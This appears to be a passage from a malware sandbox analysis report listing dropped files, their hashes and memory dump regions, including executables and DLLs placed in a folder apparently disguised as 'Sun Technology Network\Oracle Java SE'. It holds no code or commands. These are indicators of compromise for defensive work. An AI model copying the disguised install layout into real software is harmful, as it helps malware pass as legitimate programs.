| SHA512 | 6f147634ae21ea44fa897aad299773a8d158fbf690cc3b04ef0b75d3892984bf1213e5691f5a7da6e9d056384cac51b7e21970f6db5b5d24e7fdbe5d3c261254 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | 3a40f48b697892e246893282bb93ac49 |
| SHA1 | 708c905147a4813f7e8849a424dfa18c2b8ac4cf |
| SHA256 | ee517a912087ea204e9e20c036b55e8739806052b210b644d74ed4997bff13b7 |
| SHA512 | b09803e1fa3e611e0135f2fdd51331131509f48843a74e12caa579199fac655064dc38c4db278488c0023d23dd6a27233a6bbdd1ce8778779df6e6a339b00e83 |
C:\Windows\Installer\MSIA46F.tmp
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| MD5 | 36b24a4deb93b2af6da9dba72eefaa5f |
| SHA1 | 8c55de3fa1269f4fdba9a5c701c5daad84d59f38 |
| SHA256 | d3370bb63c1908550c49601fcc664313809fcb68fdfdb81ef8129fe465a254d2 |
| SHA512 | 572355b5ab4fd349c71aaf66d5a1232e48ee697bb96b84b6656dc6b6c64f7c8098e00772e1b519805bb441159281ec5f90ff91a20ed17597704bf2492f8fff9d |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll
| MD5 | 1e109b1d40efcfec81a5d43d318cbb26 |
| SHA1 | 03aae193dc36d70fb34257d1276666e988b4a222 |
| SHA256 | 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69 |
| SHA512 | 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll
| MD5 | b3c188281aa3998f49391da0c3b52b8e |
| SHA1 | 67e6f1eb07861dddde3df9d266f683cb0331d433 |
| SHA256 | 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46 |
| SHA512 | 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll
| MD5 | 888aa12cc20f645dd2fc04f52e453bc6 |
| SHA1 | b19e790c9e6ceface9cdd41a24518d6e4a953b23 |
| SHA256 | 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb |
| SHA512 | f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat
| MD5 | c41305cebcf71d9369f6af4b57c8bbca |
| SHA1 | 4a8245d040f781ed14541af314588cc7cdba793b |
| SHA256 | d2471d2070a7cbd5f1903d03fa1e33418e72129a2721a14c038810f11510a2f7 |
| SHA512 | e530516f97c5130a97dfa4e134d850ff97ad46f88789d3cb1ba91fa3fa504a27be6f284506bbd3fe1924b0f9d16ea4571fdb4fe835873668295622e1243b15f5 |
memory/3988-78-0x0000000002DD0000-0x0000000002E06000-memory.dmp
memory/1712-79-0x0000000004E90000-0x00000000054B8000-memory.dmp
memory/3752-80-0x0000000005490000-0x00000000054B2000-memory.dmp
memory/3988-81-0x0000000005AB0000-0x0000000005B16000-memory.dmp
memory/3752-87-0x00000000056D0000-0x0000000005736000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qmzq2i1.j5k.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3752-102-0x0000000005E90000-0x00000000061E4000-memory.dmp
memory/3988-111-0x0000000006350000-0x000000000636E000-memory.dmp
memory/3988-112-0x0000000006380000-0x00000000063CC000-memory.dmp
memory/3752-115-0x000000006FC80000-0x000000006FCCC000-memory.dmp
memory/1712-114-0x000000006FC80000-0x000000006FCCC000-memory.dmp
memory/1712-113-0x0000000006C70000-0x0000000006CA2000-memory.dmp
memory/1712-130-0x0000000006CB0000-0x0000000006CCE000-memory.dmp
memory/3988-136-0x000000006FC80000-0x000000006FCCC000-memory.dmp
memory/1712-135-0x0000000006CD0000-0x0000000006D73000-memory.dmp
memory/3988-147-0x0000000007690000-0x00000000076AA000-memory.dmp
memory/3988-146-0x0000000007CD0000-0x000000000834A000-memory.dmp
memory/3752-148-0x00000000077C0000-0x00000000077CA000-memory.dmp
memory/1712-149-0x0000000007090000-0x0000000007126000-memory.dmp
memory/3988-150-0x0000000007890000-0x00000000078A1000-memory.dmp
memory/1712-151-0x0000000007030000-0x000000000703E000-memory.dmp
memory/3752-152-0x00000000079A0000-0x00000000079B4000-memory.dmp
memory/3988-153-0x00000000079E0000-0x00000000079FA000-memory.dmp
memory/3988-154-0x0000000007910000-0x0000000007918000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ff575baec38758fd4fc88d1b28acbfa |
| SHA1 | 29902309c070efa5dd9cc33d5c32da258670c3f4 |
| SHA256 | c824d34567ff7149502eaee52f159ccfa37ae41f434259af51ce6958e54cd988 |
| SHA512 | bd3046c02fdfd6dce0cd7ebd9ccb6e8e7ca3589c6964012f2b0574e700712cb50e2059f182b43f681177c33f83582092fda337adf3c5da41538a93c8992d4d55 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7fb62ca91e9ad74aca6fc767b900945c |
| SHA1 | 272045782426d95b66e100d0ace1c36d7d076c8d |
| SHA256 | a902d8973165b7c6fc4656d8e13a619da2feea017ba9d830400240bfdcd8f8e9 |
| SHA512 | f96d4d6a05c665e890257fb84dc61923474d31e1858da9c149d2b9a9d14053d3a42579a08e8ce80c2dfc186564649999ed7c527fa9cc446f859e90c543eb7dbb |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
| MD5 | 96b62cfb83cf0e9790a3ef939173ee31 |
| SHA1 | 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1 |
| SHA256 | 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23 |
| SHA512 | d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b |
memory/4516-174-0x00000000054F0000-0x0000000005844000-memory.dmp
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll
| MD5 | e7fcab954f116c8bb4b006145c20dd23 |
| SHA1 | 91ee70a33ab12618f0f0ec229de4583d9aa52a8a |
| SHA256 | e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2 |
| SHA512 | d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll
| MD5 | 2e68a858f54dda699080af452da69e39 |
| SHA1 | 32a47540728cca729da3972f180c5c70042f0aca |
| SHA256 | 8c9889fad72842cd414738b8ef1915563d29e85e6defc1b147ea8864015a1d7b |
| SHA512 | 7754cbc50dd27553ca61206cb4cbe3ca36d3299ba31ce342ac293507cd445f68acec918602b35fb727132b9dd348c97575e21742c781a04cdceb22fea467851d |
memory/4516-284-0x0000000005C20000-0x0000000005C6C000-memory.dmp
memory/4516-316-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/4516-326-0x0000000006DD0000-0x0000000006E73000-memory.dmp
memory/3888-327-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/4348-337-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/1612-347-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/4528-367-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/552-357-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/2660-387-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/4832-397-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/3608-377-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/4516-417-0x0000000007120000-0x0000000007131000-memory.dmp
memory/4480-407-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/420-419-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/3032-429-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/2224-441-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/3396-439-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/3480-459-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/3600-469-0x000000006F610000-0x000000006F65C000-memory.dmp
memory/4516-479-0x0000000007160000-0x0000000007174000-memory.dmp
memory/3000-480-0x00007FFA80910000-0x00007FFA80D90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4db5aa714df95aedea3dfa0aeffba86e |
| SHA1 | b9f0356863d8c92fdba288de646abf9ffcff2084 |
| SHA256 | 6299ec59bcbcf3c9bd10720e3268f1e0b9a1c6a1b88a734f61653d63a9df9c65 |
| SHA512 | 73ccd94cd62ffe7d34e03c021fac7f27fe47582dcaa36b02de3ce2624b45a66887b75a865bf1d22d645b1288f7804e4a918272603af322dc9ed8bbb9cf246cc8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6cb9420fb2ad84212412db196018d265 |
| SHA1 | f4cc72376c0d9defc2a6ceacdde12c334d297f98 |
| SHA256 | 8dd9e7fce514a3da2cc70e5e9f770d3b219e2e45a921332b9f9fcdaf42bb43bb |
| SHA512 | 42966079f426ed980ce1a40907337689226508816738d46c714c406d252e645dbb22ad27771fabdacec4b3a99c60c8ae4b3e474887b002eecc4a8350128ba783 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a373b8f003df153d15f671b9d6ed0c1f |
| SHA1 | 7812c002f0c577c63f04d8767f623641b9935eeb |
| SHA256 | 1d63eef9e0d0bacbd5859d8da5a72308920a6b4e785f1b530f26fc2426bcef07 |
| SHA512 | 14641b254ea96940cc691b8fdf62f80256a651ca4a422b43ba7ae8d680ba9d76c4b8a4c0b1f77bdfe132090b5ff60a5d17ea15fc1a08d4657304ae7978ab4bca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2a59a7ebbf06330f2a1e4fb146939c8a |
| SHA1 | 595921c3a32e1fa25a540e547712bd03c4e3b503 |
| SHA256 | f29240f7642cb1544ce9dbff87a7efc1f216e2cb6517cca7329c4c14ed148f53 |
| SHA512 | 1bdc25e1f8a3e830a99076af9f030332246c311d08476bc4b4f51be23d3088310575808d149db98ca4f75dfb8ca236bcfe67dbba46ceabdf24480541321f192e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70dc12e7ba0e5f21403b60415229231f |
| SHA1 | c3c30852aef9bef3127e9944dd333104817d63b7 |
| SHA256 | 01aa53e0f1c5b6f6b85d242427ef5386e8afa2bdb8046280ddf957e72355c39d |
| SHA512 | fcec8183747dc7bbde32e581afc054b83e7d4f44797871dfbdbcab6a5ba80e2d384283855c529a6d269624f847ff5803dc3c0f7ce1212aedf8f39fd8ee5a7b6b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9d78ece7758f31d1851d458deba14430 |
| SHA1 | 14e785c4245fc139711c5723f1033a27acf5c43f |
| SHA256 | 9cfbfabea93c71d3697f277721ec0c68984717182e9ec41f470fb3b08c059a14 |
| SHA512 | 84211728968352238a459681cebdbcd2d504fc1a568bbc27cb5488923c57c1ef9bfbae18ee2e1075f409609ec6ec2754f11aab6767d440ecb225972318f51d4b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 85d9a7d326ab6e475670b8b87e46a05a |
| SHA1 | 9e99ec99a5c2af75e81ec489cb7888feb730fc48 |
| SHA256 | bfea3e8d747f2cf88087355e34431fc88a78d1cdbe14c04bf701cd9516f03a40 |
| SHA512 | 7b9598de902bd5c199e6b1bbf7e14028dff66baae2f7a3e2b23fca7b7896e1964eb0d0616a736f1bf2a0fcabc34c678e2fdc333e3f3696d838afccfabe32f01c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ada02612e67f1c40b90dc1c6843a2f9 |
| SHA1 | 223cab9cc26350d757e9c8fb1f4d0b86fad7a318 |
| SHA256 | c0ab05a51565b5460d943d4716f3a3736a8ba0355f2debc99228bbff7b187e93 |
| SHA512 | 2c4a2b70e9c212a654ebe78911357e0e089344c073e1e4dbba7c1dbb8dbcc389f7f726f07c1f1cd949ec54a4bea71910f6682185f7a226294e0e6b4df8538c3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1caf3595ce8ebc134da8216f111aeb19 |
| SHA1 | a2102e690189fa00af8b08225608eba04a61ed04 |
| SHA256 | 90a80a7379ebee20349f478bc5648531f6a82d8dd5b6a8d8d89cea09fa2805c0 |
| SHA512 | 0752be235720018a30e40b88adea8f2c8f898ed371f4554a638d1137e8360f6641928ebf3a6e4d979ea022834def43e0c31a844d9f13c0935d6698708b34ebeb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5ca3e16b506d7d705d6b433e626a5d53 |
| SHA1 | 9d990877202ba05ff36e24aa2fe359301036e7ba |
| SHA256 | c4287a99073aa0adc0a6156a51304b8f36fc5bae3cbce6d248d3d95fb8d40600 |
| SHA512 | bc74d45b8d35212bc1ff421572bc04c6433e4d261a96deb71af39303498f60588a51757e54dcafe24234de898f7b195388bf37413e1b957fde47d66d7d5171f9 |
C:\Config.Msi\e57a2e8.rbs
| MD5 | dcca9d4c5add35582b45d57be11f1492 |
| SHA1 | 7ff7cf46e46f214061cae58f6f0b5126c1964a8a |
| SHA256 | d8bf969f7c260719a5ccec87374cc918e227588216ced40f8c4b300fd8e2b847 |
| SHA512 | 96718b1440abfb41ebb794bce7dbe6b18bc84e6adeb414284d8451d45339f4e2da4c3b1a36bf9d41ea737d4024111b399688c45df208204ec2cda8b86b28dc6e |
C:\Windows\Installer\e57a2e7.msi
| MD5 | 1d2fdd9c09c8452e9c88222f2c16806a |
| SHA1 | 5852958feca13943a937f638a0ea6cfb59307574 |
| SHA256 | 7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5 |
| SHA512 | 4af7abc59c5dcfa065b858b1cb6a5a89f2e79d777acbcc5c7fc57175e20973bad0712f4d9adcb5eeec7bd8c44c90e255f4e22ba9035f2a82d1e8cc45aea87fb1 |
memory/3000-520-0x00007FFA80910000-0x00007FFA80D90000-memory.dmp